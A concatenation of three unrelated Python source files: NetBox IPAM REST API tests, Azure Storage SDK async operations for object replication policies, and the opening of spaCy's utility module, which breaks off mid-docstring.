self.assertIn('detail', response.data)
class IPAddressTest(HttpStatusMixin, APITestCase):
def setUp(self):
user = User.objects.create(username='testuser', is_superuser=True)
token = Token.objects.create(user=user)
self.header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token.key)}
self.vrf1 = VRF.objects.create(name='Test VRF 1', rd='65000:1')
self.ipaddress1 = IPAddress.objects.create(address=IPNetwork('192.168.0.1/24'))
self.ipaddress2 = IPAddress.objects.create(address=IPNetwork('192.168.0.2/24'))
self.ipaddress3 = IPAddress.objects.create(address=IPNetwork('192.168.0.3/24'))
def test_get_ipaddress(self):
url = reverse('ipam-api:ipaddress-detail', kwargs={'pk': self.ipaddress1.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['address'], str(self.ipaddress1.address))
def test_list_ipaddresss(self):
url = reverse('ipam-api:ipaddress-list')
response = self.client.get(url, **self.header)
self.assertEqual(response.data['count'], 3)
def test_create_ipaddress(self):
data = {
'address': '192.168.0.4/24',
'vrf': self.vrf1.pk,
}
url = reverse('ipam-api:ipaddress-list')
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(IPAddress.objects.count(), 4)
ipaddress4 = IPAddress.objects.get(pk=response.data['id'])
self.assertEqual(str(ipaddress4.address), data['address'])
self.assertEqual(ipaddress4.vrf_id, data['vrf'])
def test_update_ipaddress(self):
data = {
'address': '192.168.0.99/24',
'vrf': self.vrf1.pk,
}
url = reverse('ipam-api:ipaddress-detail', kwargs={'pk': self.ipaddress1.pk})
response = self.client.put(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(IPAddress.objects.count(), 3)
ipaddress1 = IPAddress.objects.get(pk=response.data['id'])
self.assertEqual(str(ipaddress1.address), data['address'])
self.assertEqual(ipaddress1.vrf_id, data['vrf'])
def test_delete_ipaddress(self):
url = reverse('ipam-api:ipaddress-detail', kwargs={'pk': self.ipaddress1.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
self.assertEqual(IPAddress.objects.count(), 2)
class VLANGroupTest(HttpStatusMixin, APITestCase):
def setUp(self):
user = User.objects.create(username='testuser', is_superuser=True)
token = Token.objects.create(user=user)
self.header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token.key)}
self.vlangroup1 = VLANGroup.objects.create(name='Test VLAN Group 1', slug='test-vlan-group-1')
self.vlangroup2 = VLANGroup.objects.create(name='Test VLAN Group 2', slug='test-vlan-group-2')
self.vlangroup3 = VLANGroup.objects.create(name='Test VLAN Group 3', slug='test-vlan-group-3')
def test_get_vlangroup(self):
url = reverse('ipam-api:vlangroup-detail', kwargs={'pk': self.vlangroup1.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['name'], self.vlangroup1.name)
def test_list_vlangroups(self):
url = reverse('ipam-api:vlangroup-list')
response = self.client.get(url, **self.header)
self.assertEqual(response.data['count'], 3)
def test_create_vlangroup(self):
data = {
'name': 'Test VLAN Group 4',
'slug': 'test-vlan-group-4',
}
url = reverse('ipam-api:vlangroup-list')
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(VLANGroup.objects.count(), 4)
vlangroup4 = VLANGroup.objects.get(pk=response.data['id'])
self.assertEqual(vlangroup4.name, data['name'])
self.assertEqual(vlangroup4.slug, data['slug'])
def test_update_vlangroup(self):
data = {
'name': 'Test VLAN Group X',
'slug': 'test-vlan-group-x',
}
url = reverse('ipam-api:vlangroup-detail', kwargs={'pk': self.vlangroup1.pk})
response = self.client.put(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(VLANGroup.objects.count(), 3)
vlangroup1 = VLANGroup.objects.get(pk=response.data['id'])
self.assertEqual(vlangroup1.name, data['name'])
self.assertEqual(vlangroup1.slug, data['slug'])
def test_delete_vlangroup(self):
url = reverse('ipam-api:vlangroup-detail', kwargs={'pk': self.vlangroup1.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
self.assertEqual(VLANGroup.objects.count(), 2)
class VLANTest(HttpStatusMixin, APITestCase):
def setUp(self):
user = User.objects.create(username='testuser', is_superuser=True)
token = Token.objects.create(user=user)
self.header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token.key)}
self.vlan1 = VLAN.objects.create(vid=1, name='Test VLAN 1')
self.vlan2 = VLAN.objects.create(vid=2, name='Test VLAN 2')
self.vlan3 = VLAN.objects.create(vid=3, name='Test VLAN 3')
def test_get_vlan(self):
url = reverse('ipam-api:vlan-detail', kwargs={'pk': self.vlan1.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['name'], self.vlan1.name)
def test_list_vlans(self):
url = reverse('ipam-api:vlan-list')
response = self.client.get(url, **self.header)
self.assertEqual(response.data['count'], 3)
def test_create_vlan(self):
data = {
'vid': 4,
'name': 'Test VLAN 4',
}
url = reverse('ipam-api:vlan-list')
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(VLAN.objects.count(), 4)
vlan4 = VLAN.objects.get(pk=response.data['id'])
self.assertEqual(vlan4.vid, data['vid'])
self.assertEqual(vlan4.name, data['name'])
def test_update_vlan(self):
data = {
'vid': 99,
'name': 'Test VLAN X',
}
url = reverse('ipam-api:vlan-detail', kwargs={'pk': self.vlan1.pk})
response = self.client.put(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(VLAN.objects.count(), 3)
vlan1 = VLAN.objects.get(pk=response.data['id'])
self.assertEqual(vlan1.vid, data['vid'])
self.assertEqual(vlan1.name, data['name'])
def test_delete_vlan(self):
url = reverse('ipam-api:vlan-detail', kwargs={'pk': self.vlan1.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
self.assertEqual(VLAN.objects.count(), 2)
class ServiceTest(HttpStatusMixin, APITestCase):
def setUp(self):
user = User.objects.create(username='testuser', is_superuser=True)
token = Token.objects.create(user=user)
self.header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token.key)}
site = Site.objects.create(name='Test Site 1', slug='test-site-1')
manufacturer = Manufacturer.objects.create(name='Test Manufacturer 1', slug='test-manufacturer-1')
devicetype = DeviceType.objects.create(manufacturer=manufacturer, model='Test Device Type 1')
devicerole = DeviceRole.objects.create(name='Test Device Role 1', slug='test-device-role-1')
self.device1 = Device.objects.create(
name='Test Device 1', site=site, device_type=devicetype, device_role=devicerole
)
self.device2 = Device.objects.create(
name='Test Device 2', site=site, device_type=devicetype, device_role=devicerole
)
self.service1 = Service.objects.create(
device=self.device1, name='Test Service 1', protocol=IP_PROTOCOL_TCP, port=1
)
self.service1 = Service.objects.create(
device=self.device1, name='Test Service 2', protocol=IP_PROTOCOL_TCP, port=2
)
self.service1 = Service.objects.create(
device=self.device1, name='Test Service 3', protocol=IP_PROTOCOL_TCP, port=3
)
def test_get_service(self):
url = reverse('ipam-api:service-detail', kwargs={'pk': self.service1.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['name'], self.service1.name)
def test_list_services(self):
url = reverse('ipam-api:service-list')
response = self.client.get(url, **self.header)
self.assertEqual(response.data['count'], 3)
def test_create_service(self):
data = {
'device': self.device1.pk,
'name': 'Test Service 4',
'protocol': IP_PROTOCOL_TCP,
'port': 4,
}
url = reverse('ipam-api:service-list')
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(Service.objects.count(), 4)
service4 = Service.objects.get(pk=response.data['id'])
self.assertEqual(service4.device_id, data['device'])
self.assertEqual(service4.name, data['name'])
self.assertEqual(service4.protocol, data['protocol'])
self.assertEqual(service4.port, data['port'])
def test_update_service(self):
data = {
'device': self.device2.pk,
'name': 'Test Service X',
'protocol': IP_PROTOCOL_UDP,
'port': 99,
}
url = reverse('ipam-api:service-detail', kwargs={'pk': self.service1.pk})
response = self.client.put(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(Service.objects.count(), 3)
service1 = Service.objects.get(pk=response.data['id'])
self.assertEqual(service1.device_id, data['device'])
self.assertEqual(service1.name, data['name'])
self.assertEqual(service1.protocol, data['protocol'])
self.assertEqual(service1.port, data['port'])
def test_delete_service(self):
url = reverse('ipam-api:service-detail', kwargs={'pk': self.service1.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
self.assertEqual(Service.objects.count(), 2)
|
py | 1a40b9bcd7a60e5f00693e763691722793874a65 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._object_replication_policies_operations import build_create_or_update_request, build_delete_request, build_get_request, build_list_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ObjectReplicationPoliciesOperations:
"""ObjectReplicationPoliciesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.storage.v2021_04_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list(
self,
resource_group_name: str,
account_name: str,
**kwargs: Any
) -> AsyncIterable["_models.ObjectReplicationPolicies"]:
"""List the object replication policies associated with the storage account.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ObjectReplicationPolicies or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.storage.v2021_04_01.models.ObjectReplicationPolicies]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ObjectReplicationPolicies"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
resource_group_name=resource_group_name,
account_name=account_name,
subscription_id=self._config.subscription_id,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
resource_group_name=resource_group_name,
account_name=account_name,
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("ObjectReplicationPolicies", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/objectReplicationPolicies'} # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
account_name: str,
object_replication_policy_id: str,
**kwargs: Any
) -> "_models.ObjectReplicationPolicy":
"""Get the object replication policy of the storage account by policy ID.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param object_replication_policy_id: For the destination account, provide the value 'default'.
Configure the policy on the destination account first. For the source account, provide the
value of the policy ID that is returned when you download the policy that was defined on the
destination account. The policy is downloaded as a JSON file.
:type object_replication_policy_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ObjectReplicationPolicy, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2021_04_01.models.ObjectReplicationPolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ObjectReplicationPolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
resource_group_name=resource_group_name,
account_name=account_name,
subscription_id=self._config.subscription_id,
object_replication_policy_id=object_replication_policy_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ObjectReplicationPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/objectReplicationPolicies/{objectReplicationPolicyId}'} # type: ignore
@distributed_trace_async
async def create_or_update(
self,
resource_group_name: str,
account_name: str,
object_replication_policy_id: str,
properties: "_models.ObjectReplicationPolicy",
**kwargs: Any
) -> "_models.ObjectReplicationPolicy":
"""Create or update the object replication policy of the storage account.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param object_replication_policy_id: For the destination account, provide the value 'default'.
Configure the policy on the destination account first. For the source account, provide the
value of the policy ID that is returned when you download the policy that was defined on the
destination account. The policy is downloaded as a JSON file.
:type object_replication_policy_id: str
:param properties: The object replication policy set to a storage account. A unique policy ID
will be created if absent.
:type properties: ~azure.mgmt.storage.v2021_04_01.models.ObjectReplicationPolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ObjectReplicationPolicy, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2021_04_01.models.ObjectReplicationPolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ObjectReplicationPolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(properties, 'ObjectReplicationPolicy')
request = build_create_or_update_request(
resource_group_name=resource_group_name,
account_name=account_name,
subscription_id=self._config.subscription_id,
object_replication_policy_id=object_replication_policy_id,
content_type=content_type,
json=_json,
template_url=self.create_or_update.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ObjectReplicationPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/objectReplicationPolicies/{objectReplicationPolicyId}'} # type: ignore
@distributed_trace_async
async def delete(
self,
resource_group_name: str,
account_name: str,
object_replication_policy_id: str,
**kwargs: Any
) -> None:
"""Deletes the object replication policy associated with the specified storage account.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param object_replication_policy_id: For the destination account, provide the value 'default'.
Configure the policy on the destination account first. For the source account, provide the
value of the policy ID that is returned when you download the policy that was defined on the
destination account. The policy is downloaded as a JSON file.
:type object_replication_policy_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request(
resource_group_name=resource_group_name,
account_name=account_name,
subscription_id=self._config.subscription_id,
object_replication_policy_id=object_replication_policy_id,
template_url=self.delete.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/objectReplicationPolicies/{objectReplicationPolicyId}'} # type: ignore
|
py | 1a40bb5caef6d3465dd9f171e49a895c2a2ef514 | # coding: utf8
from __future__ import unicode_literals, print_function
import os
import pkg_resources
import importlib
import re
from pathlib import Path
import random
from collections import OrderedDict
from thinc.neural._classes.model import Model
from thinc.neural.ops import NumpyOps
import functools
import itertools
import numpy.random
import srsly
try:
import jsonschema
except ImportError:
jsonschema = None
try:
import cupy.random
except ImportError:
cupy = None
from .symbols import ORTH
from .compat import cupy, CudaStream, path2str, basestring_, unicode_
from .compat import import_file
from .errors import Errors, Warnings, deprecation_warning
LANGUAGES = {}
_data_path = Path(__file__).parent / "data"
_PRINT_ENV = False
def set_env_log(value):
global _PRINT_ENV
_PRINT_ENV = value
def lang_class_is_loaded(lang):
"""Check whether a Language class is already loaded. Language classes are
loaded lazily, to avoid expensive setup code associated with the language
data.
lang (unicode): Two-letter language code, e.g. 'en'.
RETURNS (bool): Whether a Language class has been loaded.
"""
global LANGUAGES
return lang in LANGUAGES
def get_lang_class(lang):
"""Import and load a Language class.
lang (unicode): Two-letter language code, e.g. 'en'.
RETURNS (Language): Language class.
"""
global LANGUAGES
# Check if an entry point is exposed for the language code
entry_point = get_entry_point("spacy_languages", lang)
if entry_point is not None:
LANGUAGES[lang] = entry_point
return entry_point
if lang not in LANGUAGES:
try:
module = importlib.import_module(".lang.%s" % lang, "spacy")
except ImportError as err:
raise ImportError(Errors.E048.format(lang=lang, err=err))
LANGUAGES[lang] = getattr(module, module.__all__[0])
return LANGUAGES[lang]
def set_lang_class(name, cls):
"""Set a custom Language class name that can be loaded via get_lang_class.
name (unicode): Name of Language class.
cls (Language): Language class.
"""
global LANGUAGES
LANGUAGES[name] = cls
def get_data_path(require_exists=True):
"""Get path to spaCy data directory.
require_exists (bool): Only return path if it exists, otherwise None.
RETURNS (Path or None): Data path or None.
"""
if not require_exists:
return _data_path
else:
return _data_path if _data_path.exists() else None
def set_data_path(path):
"""Set path to spaCy data directory.
path (unicode or Path): Path to new data directory.
"""
global _data_path
_data_path = ensure_path(path)
def ensure_path(path):
"""Ensure string is converted to a Path.
path: Anything. If string, it's converted to Path.
RETURNS: Path or original argument.
"""
if isinstance(path, basestring_):
return Path(path)
else:
return path
def load_model(name, **overrides):
"""Load a model from a shortcut link, package or data path.
name (unicode): Package name, shortcut link or model path.
**overrides: Specific overrides, like pipeline components to disable.
RETURNS (Language): `Language` class with the loaded model.
"""
data_path = get_data_path()
if not data_path or not data_path.exists():
raise IOError(Errors.E049.format(path=path2str(data_path)))
if isinstance(name, basestring_): # in data dir / shortcut
if name in set([d.name for d in data_path.iterdir()]):
return load_model_from_link(name, **overrides)
if is_package(name): # installed as package
return load_model_from_package(name, **overrides)
if Path(name).exists(): # path to model data directory
return load_model_from_path(Path(name), **overrides)
elif hasattr(name, "exists"): # Path or Path-like to model data
return load_model_from_path(name, **overrides)
raise IOError(Errors.E050.format(name=name))
def load_model_from_link(name, **overrides):
"""Load a model from a shortcut link, or directory in spaCy data path."""
path = get_data_path() / name / "__init__.py"
try:
cls = import_file(name, path)
except AttributeError:
raise IOError(Errors.E051.format(name=name))
return cls.load(**overrides)
def load_model_from_package(name, **overrides):
"""Load a model from an installed package."""
cls = importlib.import_module(name)
return cls.load(**overrides)
def load_model_from_path(model_path, meta=False, **overrides):
"""Load a model from a data directory path. Creates Language class with
pipeline from meta.json and then calls from_disk() with path."""
if not meta:
meta = get_model_meta(model_path)
cls = get_lang_class(meta["lang"])
nlp = cls(meta=meta, **overrides)
pipeline = meta.get("pipeline", [])
disable = overrides.get("disable", [])
if pipeline is True:
pipeline = nlp.Defaults.pipe_names
elif pipeline in (False, None):
pipeline = []
for name in pipeline:
if name not in disable:
config = meta.get("pipeline_args", {}).get(name, {})
component = nlp.create_pipe(name, config=config)
nlp.add_pipe(component, name=name)
return nlp.from_disk(model_path)
def load_model_from_init_py(init_file, **overrides):
"""Helper function to use in the `load()` method of a model package's
__init__.py.
init_file (unicode): Path to model's __init__.py, i.e. `__file__`.
**overrides: Specific overrides, like pipeline components to disable.
RETURNS (Language): `Language` class with loaded model.
"""
model_path = Path(init_file).parent
meta = get_model_meta(model_path)
data_dir = "%s_%s-%s" % (meta["lang"], meta["name"], meta["version"])
data_path = model_path / data_dir
if not model_path.exists():
raise IOError(Errors.E052.format(path=path2str(data_path)))
return load_model_from_path(data_path, meta, **overrides)
def get_model_meta(path):
"""Get model meta.json from a directory path and validate its contents.
path (unicode or Path): Path to model directory.
RETURNS (dict): The model's meta data.
"""
model_path = ensure_path(path)
if not model_path.exists():
raise IOError(Errors.E052.format(path=path2str(model_path)))
meta_path = model_path / "meta.json"
if not meta_path.is_file():
raise IOError(Errors.E053.format(path=meta_path))
meta = srsly.read_json(meta_path)
for setting in ["lang", "name", "version"]:
if setting not in meta or not meta[setting]:
raise ValueError(Errors.E054.format(setting=setting))
return meta
def is_package(name):
"""Check if string maps to a package installed via pip.
name (unicode): Name of package.
RETURNS (bool): True if installed package, False if not.
"""
name = name.lower() # compare package name against lowercase name
packages = pkg_resources.working_set.by_key.keys()
for package in packages:
if package.lower().replace("-", "_") == name:
return True
return False
def get_package_path(name):
"""Get the path to an installed package.
name (unicode): Package name.
RETURNS (Path): Path to installed package.
"""
name = name.lower() # use lowercase version to be safe
# Here we're importing the module just to find it. This is worryingly
# indirect, but it's otherwise very difficult to find the package.
pkg = importlib.import_module(name)
return Path(pkg.__file__).parent
def get_entry_points(key):
"""Get registered entry points from other packages for a given key, e.g.
'spacy_factories' and return them as a dictionary, keyed by name.
key (unicode): Entry point name.
RETURNS (dict): Entry points, keyed by name.
"""
result = {}
for entry_point in pkg_resources.iter_entry_points(key):
result[entry_point.name] = entry_point.load()
return result
def get_entry_point(key, value):
"""Check if registered entry point is available for a given name and
load it. Otherwise, return None.
key (unicode): Entry point name.
value (unicode): Name of entry point to load.
RETURNS: The loaded entry point or None.
"""
for entry_point in pkg_resources.iter_entry_points(key):
if entry_point.name == value:
return entry_point.load()
def is_in_jupyter():
"""Check if user is running spaCy from a Jupyter notebook by detecting the
IPython kernel. Mainly used for the displaCy visualizer.
RETURNS (bool): True if in Jupyter, False if not.
"""
# https://stackoverflow.com/a/39662359/6400719
try:
shell = get_ipython().__class__.__name__
if shell == "ZMQInteractiveShell":
return True # Jupyter notebook or qtconsole
except NameError:
return False # Probably standard Python interpreter
return False
def get_cuda_stream(require=False):
if CudaStream is None:
return None
elif isinstance(Model.ops, NumpyOps):
return None
else:
return CudaStream()
def get_async(stream, numpy_array):
if cupy is None:
return numpy_array
else:
array = cupy.ndarray(numpy_array.shape, order="C", dtype=numpy_array.dtype)
array.set(numpy_array, stream=stream)
return array
def env_opt(name, default=None):
if type(default) is float:
type_convert = float
else:
type_convert = int
if "SPACY_" + name.upper() in os.environ:
value = type_convert(os.environ["SPACY_" + name.upper()])
if _PRINT_ENV:
print(name, "=", repr(value), "via", "$SPACY_" + name.upper())
return value
elif name in os.environ:
value = type_convert(os.environ[name])
if _PRINT_ENV:
print(name, "=", repr(value), "via", "$" + name)
return value
else:
if _PRINT_ENV:
print(name, "=", repr(default), "by default")
return default
def read_regex(path):
path = ensure_path(path)
with path.open() as file_:
entries = file_.read().split("\n")
expression = "|".join(
["^" + re.escape(piece) for piece in entries if piece.strip()]
)
return re.compile(expression)
def compile_prefix_regex(entries):
"""Compile a sequence of prefix rules into a regex object.
entries (tuple): The prefix rules, e.g. spacy.lang.punctuation.TOKENIZER_PREFIXES.
RETURNS (regex object): The regex object. to be used for Tokenizer.prefix_search.
"""
if "(" in entries:
# Handle deprecated data
expression = "|".join(
["^" + re.escape(piece) for piece in entries if piece.strip()]
)
return re.compile(expression)
else:
expression = "|".join(["^" + piece for piece in entries if piece.strip()])
return re.compile(expression)
def compile_suffix_regex(entries):
"""Compile a sequence of suffix rules into a regex object.
entries (tuple): The suffix rules, e.g. spacy.lang.punctuation.TOKENIZER_SUFFIXES.
RETURNS (regex object): The regex object. to be used for Tokenizer.suffix_search.
"""
expression = "|".join([piece + "$" for piece in entries if piece.strip()])
return re.compile(expression)
def compile_infix_regex(entries):
"""Compile a sequence of infix rules into a regex object.
entries (tuple): The infix rules, e.g. spacy.lang.punctuation.TOKENIZER_INFIXES.
RETURNS (regex object): The regex object. to be used for Tokenizer.infix_finditer.
"""
expression = "|".join([piece for piece in entries if piece.strip()])
return re.compile(expression)
def add_lookups(default_func, *lookups):
"""Extend an attribute function with special cases. If a word is in the
lookups, the value is returned. Otherwise the previous function is used.
default_func (callable): The default function to execute.
*lookups (dict): Lookup dictionary mapping string to attribute value.
RETURNS (callable): Lexical attribute getter.
"""
# This is implemented as functools.partial instead of a closure, to allow
# pickle to work.
return functools.partial(_get_attr_unless_lookup, default_func, lookups)
def _get_attr_unless_lookup(default_func, lookups, string):
for lookup in lookups:
if string in lookup:
return lookup[string]
return default_func(string)
def update_exc(base_exceptions, *addition_dicts):
"""Update and validate tokenizer exceptions. Will overwrite exceptions.
base_exceptions (dict): Base exceptions.
*addition_dicts (dict): Exceptions to add to the base dict, in order.
RETURNS (dict): Combined tokenizer exceptions.
"""
exc = dict(base_exceptions)
for additions in addition_dicts:
for orth, token_attrs in additions.items():
if not all(isinstance(attr[ORTH], unicode_) for attr in token_attrs):
raise ValueError(Errors.E055.format(key=orth, orths=token_attrs))
described_orth = "".join(attr[ORTH] for attr in token_attrs)
if orth != described_orth:
raise ValueError(Errors.E056.format(key=orth, orths=described_orth))
exc.update(additions)
exc = expand_exc(exc, "'", "’")
return exc
def expand_exc(excs, search, replace):
"""Find string in tokenizer exceptions, duplicate entry and replace string.
For example, to add additional versions with typographic apostrophes.
excs (dict): Tokenizer exceptions.
search (unicode): String to find and replace.
replace (unicode): Replacement.
RETURNS (dict): Combined tokenizer exceptions.
"""
def _fix_token(token, search, replace):
fixed = dict(token)
fixed[ORTH] = fixed[ORTH].replace(search, replace)
return fixed
new_excs = dict(excs)
for token_string, tokens in excs.items():
if search in token_string:
new_key = token_string.replace(search, replace)
new_value = [_fix_token(t, search, replace) for t in tokens]
new_excs[new_key] = new_value
return new_excs
def normalize_slice(length, start, stop, step=None):
if not (step is None or step == 1):
raise ValueError(Errors.E057)
if start is None:
start = 0
elif start < 0:
start += length
start = min(length, max(0, start))
if stop is None:
stop = length
elif stop < 0:
stop += length
stop = min(length, max(start, stop))
return start, stop
def minibatch(items, size=8):
"""Iterate over batches of items. `size` may be an iterator,
so that batch-size can vary on each step.
"""
if isinstance(size, int):
size_ = itertools.repeat(size)
else:
size_ = size
items = iter(items)
while True:
batch_size = next(size_)
batch = list(itertools.islice(items, int(batch_size)))
if len(batch) == 0:
break
yield list(batch)
def compounding(start, stop, compound):
"""Yield an infinite series of compounding values. Each time the
generator is called, a value is produced by multiplying the previous
value by the compound rate.
EXAMPLE:
>>> sizes = compounding(1., 10., 1.5)
>>> assert next(sizes) == 1.
>>> assert next(sizes) == 1 * 1.5
>>> assert next(sizes) == 1.5 * 1.5
"""
def clip(value):
return max(value, stop) if (start > stop) else min(value, stop)
curr = float(start)
while True:
yield clip(curr)
curr *= compound
def stepping(start, stop, steps):
"""Yield an infinite series of values that step from a start value to a
final value over some number of steps. Each step is (stop-start)/steps.
After the final value is reached, the generator continues yielding that
value.
EXAMPLE:
>>> sizes = stepping(1., 200., 100)
>>> assert next(sizes) == 1.
